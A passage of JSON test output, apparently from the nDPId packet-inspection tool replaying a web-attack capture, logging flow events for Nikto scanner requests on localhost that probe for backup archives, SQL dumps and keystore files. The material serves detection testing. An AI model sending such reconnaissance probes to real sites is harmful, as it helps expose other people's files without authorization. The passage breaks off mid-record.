{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1576420277291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277291,"pkt":"AAAAAAAAAAAAAAAACABFAADCVkJAAEAG5fF\/AAABfwAAAcSSH5BxEW7rgO+zGYAYAED+tgAAAQEICp1m\/VOdZv1SR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1576420277292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277292,"pkt":"AAAAAAAAAAAAAAAACABFAADC9VNAAEAGRuB\/AAABfwAAAcSUH5A3Js37LMn8joAYAED+tgAAAQEICp1m\/VSdZv1UR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1576420277293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277293,"pkt":"AAAAAAAAAAAAAAAACABFAADB0lRAAEAGaeB\/AAABfwAAAcSWH5D4eer6AmSqt4AYAED+tQAAAQEICp1m\/VWdZv1VR0VUIC8xLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1576420277295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277295,"pkt":"AAAAAAAAAAAAAAAACABFAADBgrRAAEAGuYB\/AAABfwAAAcSYH5BqProaPd\/PWYAYAED+tQAAAQEICp1m\/VedZv1XR0VUIC8xLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1576420277296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277296,"pkt":"AAAAAAAAAAAAAAAACABFAADFhERAAEAGt+x\/AAABfwAAAcSaH5DLx7zvpnN3coAYAED+uQAAAQEICp1m\/VidZv1YR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1576420277298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277298,"pkt":"AAAAAAAAAAAAAAAACABFAADFkbNAAEAGqn1\/AAABfwAAAcScH5DniakeYsnjE4AYAED+uQAAAQEICp1m\/VqdZv1aR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1576420277299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277299,"pkt":"AAAAAAAAAAAAAAAACABFAADATXFAAEAG7sR\/AAABfwAAAcSeH5C5OnXDLQhZdIAYAED+tAAAAQEICp1m\/VudZv1bR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1576420277301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277301,"pkt":"AAAAAAAAAAAAAAAACABFAADAvp1AAEAGfZh\/AAABfwAAAcSgH5BBBoY3\/wT40oAYAED+tAAAAQEICp1m\/V2dZv1dR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1576420277302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277302,"pkt":"AAAAAAAAAAAAAAAACABFAADG+c1AAEAGQmJ\/AAABfwAAAcSiH5Dkc8Fn99puBYAYAED+ugAAAQEICp1m\/V6dZv1eR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1576420277304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277304,"pkt":"AAAAAAAAAAAAAAAACABFAADGn2FAAEAGnM5\/AAABfwAAAcSkH5ABoKfybJgPqoAYAED+ugAAAQEICp1m\/WCdZv1gR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1576420277306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277306,"pkt":"AAAAAAAAAAAAAAAACABFAADBq8lAAEAGkGt\/AAABfwAAAcSmH5B085NqCLeHfoAYAED+tQAAAQEICp1m\/WGdZv1hR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 